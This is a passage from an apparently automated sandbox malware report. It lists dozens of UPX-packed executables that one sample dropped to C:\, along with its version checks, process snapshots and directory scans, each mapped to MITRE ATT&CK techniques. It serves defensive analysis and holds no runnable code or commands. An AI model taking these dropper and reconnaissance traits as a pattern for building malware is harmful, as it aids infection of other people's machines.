external PDB) for MS Windows UPX compressed\"- Location: [C:\\6266488.exe]- [targetUID: 00000000-00003380]\n \"htbtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\htbtt.exe]- [targetUID: 00000000-00006132]\n \"bvfpxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bvfpxr.exe]- [targetUID: 00000000-00006132]\n \"phtdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phtdn.exe]- [targetUID: 00000000-00002172]\n \"tvvfv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tvvfv.exe]- [targetUID: 00000000-00002172]\n \"rfppdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rfppdt.exe]- [targetUID: 00000000-00002160]\n \"822088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\822088.exe]- [targetUID: 00000000-00002164]\n \"66822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66822.exe]- [targetUID: 00000000-00002164]\n \"444866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\444866.exe]- [targetUID: 00000000-00004248]\n \"088400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\088400.exe]- [targetUID: 00000000-00004408]\n \"04466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04466.exe]- [targetUID: 00000000-00004408]\n \"2466400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2466400.exe]- [targetUID: 00000000-00002268]\n \"88220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88220.exe]- [targetUID: 00000000-00003556]\n \"22884.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22884.exe]- [targetUID: 00000000-00003556]\n \"80840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80840.exe]- [targetUID: 00000000-00003968]\n \"62820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62820.exe]- [targetUID: 00000000-00003968]\n \"028488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\028488.exe]- [targetUID: 00000000-00004388]\n \"2204222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2204222.exe]- [targetUID: 00000000-00003500]\n \"828882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\828882.exe]- [targetUID: 00000000-00002492]\n \"44882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44882.exe]- [targetUID: 00000000-00001976]\n \"82880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82880.exe]- [targetUID: 00000000-00005900]\n \"trxpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trxpd.exe]- [targetUID: 00000000-00005900]\n \"tbhlt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbhlt.exe]- [targetUID: 00000000-00003904]\n \"jdtpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdtpf.exe]- [targetUID: 00000000-00003904]\n \"trtdln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trtdln.exe]- [targetUID: 00000000-00005924]\n \"8266402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8266402.exe]- [targetUID: 00000000-00004220]\n \"6408002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6408002.exe]- [targetUID: 00000000-00005956]\n \"6042668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6042668.exe]- [targetUID: 00000000-00005956]\n \"0862264.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0862264.exe]- [targetUID: 00000000-00004160]\n \"txphbj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\txphbj.exe]- [targetUID: 00000000-00004160]\n \"rhhbnrn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhhbnrn.exe]- [targetUID: 00000000-00004260]\n \"tdthpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdthpd.exe]- [targetUID: 00000000-00005932]\n \"rbbttj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbbttj.exe]- [targetUID: 00000000-00005832]\n \"pndnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pndnt.exe]- [targetUID: 00000000-00005856]\n \"202828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\202828.exe]- [targetUID: 00000000-00006096]\n \"22420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22420.exe]- [targetUID: 00000000-00006096]\n \"2668286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2668286.exe]- [targetUID: 00000000-00005996]\n \"2662206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2662206.exe]- [targetUID: 00000000-00005820]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006700d8ab6700d3ab6700000000000000000000006000000000011ce312000000000080f0120095e1d077980b0700feffffff435cd4775059d477aa000000b8000000d2ab6700d0ab6700a4e41200dce81200000000000000000000000000000000000000000000000000001a0000000060001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd477faab6700a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa75faab6700a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005820)\n \"2662206.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001800e83e1800e33e180000000000000000000000150000000001ecdf12000000000050ed120095e1d077b10a0700feffffff435cd4775059d477aa000000b8000000e23e1800e03e180074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5cd37760d8c375ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096edd4770a3f1800a06aaa758600000074e11200ace512000000000086008800a06aaa7574e11200916caa750a3f1800a06aaa75a06aaa75e4e5120002020000 (UID: 00000000-00005996)\n \"2662206.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"2668286.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a0058306a0053306a00000000000000000000006200000000011ce312000000000080f0120095e1d077c6080700feffffff435cd4775059d477aa000000b800000052306a0050306a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd4777a306a00a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa757a306a00a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00005980)\n \"2668286.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005980)\n \"22420.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000027002865270023652700000000000000000000001f00000000011ce312000000000080f0120095e1d077c00f0700feffffff435cd4775059d477aa000000b80000002265270020652700a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001f001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd4774a652700a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa754a652700a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00006096)\n \"22420.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006096)\n \"202828.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005856)\n \"202828.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000021003844210033442100000000000000000000001900000000011ce312000000000080f0120095e1d077d20d0700feffffff435cd4775059d477aa000000b80000003244210030442100a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000019001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd4775a442100a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa755a442100a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00005856)\n \"202828.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005856)\n \"pndnt.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005832)\n \"pndnt.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340010af34000baf3400000000000000000000002d00000000011ce312000000000080f0120095e1d077d5330700feffffff435cd4775059d477aa000000b80000000aaf340008af3400a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002d001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd47732af3400a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa7532af3400a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00005832)\n \"pndnt.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005832)\n \"rbbttj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f0078371f0073371f00000000000000000000001700000000011ce312000000000080f0120095e1d077d8310700feffffff435cd4775059d477aa000000b800000072371f0070371f00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd4779a371f00a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa759a371f00a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00004164)\n \"rbbttj.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004164)\n \"tdthpd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a0068316a0063316a00000000000000000000006200000000011ce312000000000080f0120095e1d077d2300700feffffff435cd4775059d477aa000000b800000062316a0060316a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd4778a316a00a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa758a316a00a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00005932)\n \"tdthpd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)\n \"rhhbnrn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004260)\n \"rhhbnrn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a0098312a0093312a00000000000000000000002200000000011ce312000000000080f0120095e1d077cb370700feffffff435cd4775059d477aa000000b800000092312a0090312a00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000022001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd477ba312a00a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa75ba312a00a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00004260)\n \"rhhbnrn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004260)\n \"txphbj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004160)\n \"txphbj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002500c0302500bb302500000000000000000000001d00000000011ce312000000000080f0120095e1d0776a350700feffffff435cd4775059d477aa000000b8000000ba302500b8302500a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001d001c5cd37760d8c375ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd477e2302500a06aaa7586000000a4e41200dce812000000000086008800a06aaa75a4e41200916caa75e2302500a06aaa75a06aaa7514e9120002020000 (UID: 00000000-00004160)\n \"txphbj.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004160)\n \"0862264.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004176)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"202828.exe\" called \"IsWow64Process\" with parameter \"5856\" - (UID: 00000000-00005856)\n \"pndnt.exe\" called \"IsWow64Process\" with parameter \"5832\" - (UID: 00000000-00005832)\n \"rhhbnrn.exe\" called \"IsWow64Process\" with parameter \"4260\" - (UID: 00000000-00004260)\n \"txphbj.exe\" called \"IsWow64Process\" with parameter \"4160\" - (UID: 00000000-00004160)\n \"0862264.exe\" called \"IsWow64Process\" with parameter \"4176\" - (UID: 00000000-00004176)\n \"6042668.exe\" called \"IsWow64Process\" with parameter \"5956\" - (UID: 00000000-00005956)\n \"6408002.exe\" called \"IsWow64Process\" with parameter \"4220\" - (UID: 00000000-00004220)\n \"8266402.exe\" called \"IsWow64Process\" with parameter \"3476\" - (UID: 00000000-00003476)\n \"jdtpf.exe\" called \"IsWow64Process\" with parameter \"3904\" - (UID: 00000000-00003904)\n \"tbhlt.exe\" called \"IsWow64Process\" with parameter \"3652\" - (UID: 00000000-00003652)\n \"82880.exe\" called \"IsWow64Process\" with parameter \"1976\" - (UID: 00000000-00001976)\n \"44882.exe\" called \"IsWow64Process\" with parameter \"2492\" - (UID: 00000000-00002492)\n \"028488.exe\" called \"IsWow64Process\" with parameter \"4388\" - (UID: 00000000-00004388)\n \"62820.exe\" called \"IsWow64Process\" with parameter \"3968\" - (UID: 00000000-00003968)\n \"22884.exe\" called \"IsWow64Process\" with parameter \"3556\" - (UID: 00000000-00003556)\n \"88220.exe\" called \"IsWow64Process\" with parameter \"3420\" - (UID: 00000000-00003420)\n \"2466400.exe\" called \"IsWow64Process\" with parameter \"2268\" - (UID: 00000000-00002268)\n \"04466.exe\" called \"IsWow64Process\" with parameter \"4408\" - (UID: 00000000-00004408)\n \"088400.exe\" called \"IsWow64Process\" with parameter \"4248\" - (UID: 00000000-00004248)\n \"444866.exe\" called \"IsWow64Process\" with parameter \"3564\" - (UID: 00000000-00003564)\n \"66822.exe\" called \"IsWow64Process\" with parameter \"2164\" - (UID: 00000000-00002164)\n \"tvvfv.exe\" called \"IsWow64Process\" with parameter \"2172\" - (UID: 00000000-00002172)\n \"bvfpxr.exe\" called \"IsWow64Process\" with parameter \"6132\" - (UID: 00000000-00006132)\n \"htbtt.exe\" called \"IsWow64Process\" with parameter \"6112\" - (UID: 00000000-00006112)\n \"6266488.exe\" called \"IsWow64Process\" with parameter \"3380\" - (UID: 00000000-00003380)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter 0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter 2662206.exe (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005820)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005820)\n \"2662206.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005996)\n \"2662206.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005996)\n \"2662206.exe\" called \"FindNextFileW\" with parameter 0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe (UID: 00000000-00005996)\n \"2662206.exe\" called \"FindNextFileW\" with parameter 2662206.exe (UID: 00000000-00005996)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"202828.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pndnt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rhhbnrn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"txphbj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0862264.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6042668.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6408002.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8266402.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jdtpf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tbhlt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"82880.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"44882.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"028488.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"62820.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"22884.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"88220.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2466400.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n 